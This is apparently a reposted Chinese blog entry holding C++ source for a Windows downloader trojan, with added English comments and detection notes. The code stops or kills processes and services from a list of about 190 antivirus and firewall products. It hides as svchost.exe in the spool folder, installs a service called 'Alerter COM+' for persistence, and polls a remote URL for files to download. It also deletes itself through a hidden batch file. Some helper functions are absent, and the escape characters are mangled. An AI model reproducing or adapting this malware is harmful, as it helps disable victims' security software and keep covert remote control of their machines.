>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|注意事项:如欲转载,请保留以下信息。谢谢
|文章出处:http://hi.baidu.com/_wang8
|>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
上周朋友给了一套教主的vip个人源代码,于是根据需求敲敲打打改成这样。
感叹教主的确出是同类软件中的精品。
在隐藏与保护方面还是打算从驱动来做,同时常规穿墙部分因为代码太多没
有进程注入。当作练习
// WebDown.cpp : Defines the entry point for the console application.
#include "stdafx.h"
#include "WebDown.h"
#include "winsvc.h"
#include "winsock2.h"
#pragma comment(lib,"ws2_32.lib")
#include "time.h"
#include "urlmon.h"
#pragma comment(lib,"urlmon.lib")
#include <tlhelp32.h>
/
// Runtime configuration embedded in the image. WinMain's DecryptRecord() call
// for this struct is commented out, so in this build the values below are
// stored in plaintext and a string scan of the binary recovers the URL.
struct MODIFY_DATA
{
char DownFile[128];// URL of the file that lists what to download (consumed by DOWN_thread)
int WaitTime;// polling interval in minutes (DOWN_thread sleeps WaitTime*60*1000 ms)
}modify_data =
{
"http://www.baidu.com/tmp.txt",
60,// check every 60 minutes
};
// Process-wide state used by the service plumbing (ServiceMain/InstallService
// are defined elsewhere in the project; hWnd, service_status_ss,
// handle_service_status, scm, svc and test are not referenced in this excerpt).
HWND hWnd;
// Last-seen timestamp strings of the remote download list; DOWN_thread compares
// the first 8 characters of the two to decide whether to fetch the list again.
char DownFileDate1[9]="00-00-00";
char DownFileDate2[9]="00-00-00";
SERVICE_STATUS service_status_ss;
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc;
char test[128];
// Name table of security products. DisplayServices() compares running Win32
// service names against it and stops matches; KillProcess() below performs the
// equivalent per-process termination by image name (its caller is not in this
// excerpt). For a defender this table is a static signature of the binary and
// documents which products the sample tampers with.
char AntiServ[193][18] ={
"ACKWIN32",
"ADVXDWIN",
"ALERTSVC",
"ALOGSERV",
"AMON9X",
"ANTI-TROJAN",
"ANTS",
"apvxdwin",
"ATCON",
"ATUpdateR",
"ATWATCH",
"AUTODOWN",
"AutoTrace",
"AVCONSOL",
"AVGCC32",
"AVGCTRL",
"Avgctrl",
"AVGSERV",
"AvgServ",
"AVGSERV9",
"AVGW",
"avkpop",
"AVKSERV",
"avkservice",
"avkwctl9",
"AVP32",
"AVP32",
"AVPCC",
"AVPCC",
"AVPM",
"AVPM",
"Avsched32",
"AVSYNMGR",
"AvSynMgr",
"AVWINNT",
"AVXMONITOR9X",
"AVXMONITORNT",
"AVXQUAR",
"AVXW",
"BLACKD",
"BLACKICE",
"BlackICE",
"CLAW95",
"CLAW95CF",
"CLEANER",
"CLEANER3",
"CMGRDIAN",
"CONNECTIONMONITOR",
"defscangui",
"DEFWATCH",
"DOORS",
"DVP95",
"EFPEADM",
"ETRUSTCIPE",
"EVPN",
"EXPERT",
"fameh32",
"fch32",
"fih32",
"fnrb32",
"fsaa",
"fsav32",
"fsgk32",
"fsm32",
"fsma32",
"fsmb32",
"gbmenu",
"GENERICS",
"GUARD",
"GUARDDOG",
"HELP",
"IAMAPP",
"IAMSERV",
"ICLOAD95",
"ICLOADNT",
"ICMON",
"ICSUPP95",
"ICSUPPNT",
"IFACE",
"IOMON98",
"ISRV95",
"JEDI",
"LDNETMON",
"LDPROMENU",
"LDSCAN",
"LOCKDOWN",
"LOCKDOWN2000",
"LUALL",
"LUCOMSERVER",
"MCAGENT",
"MCMNHDLR",
"MCSHIELD",
"McShield",
"MCTOOL",
"MCUpdate",
"MCVSRTE",
"MCVSSHLD",
"MGAVRTCL",
"MGAVRTE",
"MGHTML",
"minilog",
"MONITOR",
"MOOLIVE",
"MWATCH",
"NAVAP",
"navapsvc",
"NAVAPW32",
"NAVENG",
"NAVEX15",
"NAVLU32",
"NAVW32",
"NAVWNT",
"NDD32",
"NeoWatchLog",
"NETUTILS",
"ngdbserv",
"NGServer",
"NISSERV",
"NISSERV",
"NISUM",
"NISUM",
"NMAIN",
"NORMIST",
"NPROTECT",
"NPSSVC",
"NSCHED32",
"ntrtscan",
"NTVDM",
"NTXconfig",
"NVC95",
//"NVSVC32",
"NWService",
"NWTOOL16",
"PADMIN",
"pavproxy",
"PCCIOMON",
"pccntmon",
"pccwin97",
"PCCWIN98",
"pcscan",
"PERSFW",
"POP3TRAP",
"POPROXY",
"PORTMONITOR",
"PROCESSMONITOR",
"PROGRAMAUDITOR",
"PROT95",
"PVIEW95",
"RAV7",
"RAV7WIN",
"REALMON",
"RESCUE",
"RTVSCN95",
"sbserv",
"SCAN32",
"SCRSCAN",
"sharedaccess",
"SPHINX",
"SPYXX",
"SS3EDIT",
"STOPW",
"SVW3",
"SWEEP95",
"SweepNet",
"SWEEPSRV",
"SWEEPSRV.SYS",
"SweepUpdate",
"SWNETSUP",
"SymProxySvc",
"SYMTRAY",
"TFAK",
"vbcmserv",
"VbCons",
"VET32",
"VET95",
"VETTRAY",
"VPC32",
"VPTRAY",
"VSCHED",
"VSECOMR",
"VSHWIN32",
"VSMAIN",
"vsmon",
"VSMON",
//"VSSTAT",
"WATCHDOG",
"WEBSCANX",
"WGFE95",
"WIMMUN32",
"WRADMIN",
"WRCTRL",
"ZAPROMINILOG",
"ZONEALARM"
};
//====================================================================
// Terminates every running process whose image name equals processName
// (case-insensitive, via CString::CompareNoCase). Walks a Toolhelp process
// snapshot, opens each match with PROCESS_TERMINATE and calls
// TerminateProcess. Not called from anything in this excerpt.
// Detection note: a Toolhelp snapshot followed by OpenProcess(PROCESS_TERMINATE)
// + TerminateProcess against security-product image names, issued by an
// unexpected parent, is a high-signal "kill security tooling" event.
void KillProcess(char * processName)
{
HANDLE hSnapshot;
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe;
Process32First(hSnapshot,&pe);
do
{ CString KillProcessName = processName;// fresh CString per iteration; compare is case-insensitive
if(KillProcessName.CompareNoCase(pe.szExeFile) == 0)
{
HANDLE hProcess;
hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,pe.th32ProcessID);
if(hProcess)
{
TerminateProcess(hProcess,0);// terminate the process (handle is not closed afterwards)
}
}
}
while(Process32Next(hSnapshot,&pe));
CloseHandle(hSnapshot);
}
//
// Stop a service.
// Stops the Win32 service named SvrName if it is not already SERVICE_STOPPED:
// opens the SCM, opens the service with SERVICE_ALL_ACCESS|DELETE, queries its
// status, sends SERVICE_CONTROL_STOP and sleeps 500 ms. Returns silently on any
// failure; neither SCM nor service handle is closed on any path. Called from
// DisplayServices() for each running service that matches AntiServ.
// Detection note: the SCM records the resulting state change in the System
// event log — TODO confirm the event IDs for the target Windows version.
void StopServices(char * SvrName)
{
CString name = SvrName;// copy into a CString for the OpenService call
SC_HANDLE scm;
SC_HANDLE service;
SERVICE_STATUS status;
if((scm=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE))==NULL)
{
//printf("OpenSCManager Error/n");
return;
}
service=OpenService(scm,name,SERVICE_ALL_ACCESS|DELETE);
if (!service)
{
//printf("OpenService error!/n");
return;
}
BOOL isSuccess=QueryServiceStatus(service,&status);
if (!isSuccess)
{
//printf("QueryServiceStatus error!/n");
return;
}
if ( status.dwCurrentState!=SERVICE_STOPPED )
{
isSuccess=ControlService(service,SERVICE_CONTROL_STOP,&status);
//if (!isSuccess )
// printf("service stop failed!/n");
//else
// printf("service stopped!/n");
Sleep( 500 );
}else
{
//printf("this service is not running!/n");
}
}
// Enumerates Win32 services in every state with a single EnumServicesStatus
// call into a 64 KiB LocalAlloc buffer, and for each service whose name matches
// an AntiServ entry (case-insensitive _strnicmp over the length of the service
// name) and is SERVICE_RUNNING, calls StopServices(). Returns TRUE only if the
// enumeration itself succeeded; the SCM handle and buffer are released at
// CleanUP on every path after OpenSCManager. Called once per polling round from
// DOWN_thread. Despite the name, nothing is displayed — the printf calls are
// commented out. Note the getchar() before return, which reads from stdin.
BOOL DisplayServices()
{
LPENUM_SERVICE_STATUS lpServices = NULL;
DWORD nSize = 0;
DWORD nServicesReturned;
DWORD nResumeHandle = 0;
DWORD dwServiceType = SERVICE_WIN32;
SC_HANDLE schSCManager = NULL;
BOOL Flag = FALSE;
DWORD i = 0;
UINT j = 0;
schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL) // Fail To Open SCM
{
//printf("Fail To Open SCM/n");
return FALSE;
}
lpServices = (LPENUM_SERVICE_STATUS) LocalAlloc(LPTR, 64 * 1024); // Allocate Ram
if (lpServices == NULL) // Fail To Allocate Ram
{
//printf("Fail To Allocate Ram/n");
goto CleanUP;
}
// Enum All Service Based On Service Type
if (EnumServicesStatus(schSCManager,
dwServiceType,
SERVICE_STATE_ALL,
(LPENUM_SERVICE_STATUS)lpServices,
64 * 1024,
&nSize,
&nServicesReturned,
&nResumeHandle) == NULL)
{
//printf("Fail To Enum Service/n");
goto CleanUP;
}
// Display The Services
// Compare each service name against the AntiServ table; stop it on a match.
//printf("%-34s%s/n/n","ServiceName","DisplayName");
for (i = 0; i < nServicesReturned; i++)
{
//printf("%s/n",lpServices[i].lpServiceName); // match against the table
for(int j = 0 ; j < 190;j++)
{
if(!_strnicmp(lpServices[i].lpServiceName,AntiServ[j],strlen(lpServices[i].lpServiceName)))
{
//printf("FindServer:%s/n",lpServices[i].lpServiceName);
if (lpServices[i].ServiceStatus.dwCurrentState == SERVICE_RUNNING)
{
//printf("STOPServer:%s/n",lpServices[i].lpServiceName);
StopServices(lpServices[i].lpServiceName);
}
}
}
}
Flag = TRUE;
// Close Service Handle,Free Allocated Ram And Return To The Caller
CleanUP:
CloseServiceHandle(schSCManager);
if (lpServices != NULL)
{
LocalFree(lpServices);
}
getchar ();
return Flag;
}
//
// Thread procedure for the periodic loop (dParam is unused). Each round:
// 1. DisplayServices() stops running services that match AntiServ;
// 2. GetDownFileDate() stores the timestamp of modify_data.DownFile in
//    DownFileDate2; if its first 8 characters differ from DownFileDate1,
//    DownFiles() processes the list and the new timestamp is remembered;
// 3. Sleep(WaitTime minutes).
// Loops forever, so the trailing return is unreachable. GetDownFileDate,
// DownFiles and DownExec are defined elsewhere in the project.
// Detection note: the beacon is presumably a plain HTTP request for the URL in
// modify_data.DownFile on a fixed WaitTime-minute cadence (GetDownFileDate is
// not in this excerpt — confirm).
unsigned long CALLBACK DOWN_thread(LPVOID dParam)
{
while(1)
{
//MessageBox(NULL,"STOP SERVER","TODO",MB_OK);
/// First scan services and stop any that match; Win32 services only.
DisplayServices();
if(GetDownFileDate(modify_data.DownFile,DownFileDate2))// timestamp of the remote list goes into Date2
{
if (strncmp(DownFileDate1,DownFileDate2,8)!=0)// list timestamp changed
{// so the list needs to be fetched again
DownFiles(modify_data.DownFile);// process every entry in the download list
//DownExec(modify_data.DownFile);// download and execute
strcpy(DownFileDate1,DownFileDate2);
}
}
Sleep(modify_data.WaitTime*60*1000);// once every WaitTime minutes
}
return 0;
}
//***********************************************// self-delete
// Removes this executable via a helper batch file ("Thanks to Spybot" in the
// original). Writes rs.bat into the temp directory with a loop that clears the
// attributes of %1 and deletes it until it is gone, then deletes the batch
// file itself; then launches it through %comspec% with this image's path as
// %1, detached and with SW_HIDE requested. CreateProcess's result is ignored.
// The string literals below read "//" and "/r/n", which look like backslash
// escapes mangled during transcription — TODO confirm against the original.
// Detection note: a batch file in %TEMP% started via comspec that deletes a
// just-executed image is a well-known self-removal pattern; the rs.bat name
// and batch contents are static indicators of this build.
void uninstall(void)//Thanks to Spybot
{
char batfile[MAX_PATH];
char tempdir[MAX_PATH];
char tcmdline[MAX_PATH];
char cmdline[MAX_PATH];
char This_File[MAX_PATH];
HANDLE f;
DWORD r;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
GetTempPath(sizeof(tempdir), tempdir);
sprintf(batfile, "%s//rs.bat", tempdir);
f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
if (f != INVALID_HANDLE_VALUE)
{
WriteFile(f,"@echo off/r/n"
":kill/r/n"
"attrib -a -r -s -h /"%1/"/r/n"
"del /F /"%1/"/r/n"
"if exist /"%1/" goto kill/r/n"
"del /F /"%0/"/r/n"
,94, &r,NULL
);
CloseHandle(f);
memset(&sinfo, 0, sizeof(STARTUPINFO));
sinfo.cb = sizeof(sinfo);
sinfo.wShowWindow = SW_HIDE;
memset(This_File,0,sizeof(This_File));
GetModuleFileName(NULL, This_File, sizeof(This_File));
sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, This_File); // build command line
ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line
// execute the batch file
CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
}
}
// Process entry point. Visible behaviour:
// 1. Builds <SystemDirectory> + "//spool//svchost.exe" (presumably
//    \spool\svchost.exe after backslash mangling — confirm). If this image is
//    not already at that path: delete whatever is there, copy itself in
//    (return -1 on failure), start the copy with the system directory as its
//    working directory, remove the original through uninstall(), and exit.
// 2. Otherwise register a service table with one entry named "Alerter COM+"
//    whose procedure is ServiceMain; if StartServiceCtrlDispatcher fails
//    (i.e. not launched by the SCM) call InstallService(). ServiceMain and
//    InstallService are defined elsewhere in the project.
// The DecryptRecord call for modify_data is commented out, so the config is
// plaintext in this build. nRetCode is never changed, so the normal path
// returns 0.
// Detection/response notes: an svchost.exe under the spool subdirectory
// rather than the system directory itself, and a service named "Alerter COM+",
// are the persistence indicators of this sample.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
int nRetCode = 0;
/// self-copy ----------------------
char SysDirBuff[256];
char filename[256];
char This_File[256];
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
strcpy(filename,SysDirBuff);
strcat(filename,"//spool//svchost.exe");
GetModuleFileName(NULL, This_File, sizeof(This_File));
if (_stricmp(This_File,filename)!=0)// not yet running from the install path
{
DeleteFile(filename);
if(::CopyFile(This_File,filename,FALSE)==0) return -1;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&pinfo,0,sizeof(pinfo));
memset(&sinfo,0,sizeof(sinfo));
CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo);
uninstall();
ExitProcess(0);
}
// Decryption step commented out; remove it for unit tests — no encryption in this build.
//DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"4321");
// Service entry table -----------------------------------
SERVICE_TABLE_ENTRY service_tab_entry[2];
service_tab_entry[0].lpServiceName="Alerter COM+"; // service name
service_tab_entry[0].lpServiceProc=ServiceMain; // service entry address
// Several entries are possible; the last one must be NULL.
service_tab_entry[1].lpServiceName=NULL;
service_tab_entry[1].lpServiceProc=NULL;
if (StartServiceCtrlDispatcher(service_tab_entry)==0)// not started by the SCM: first run
{
InstallService();
}
return nRetCode;
}
/***********************************************/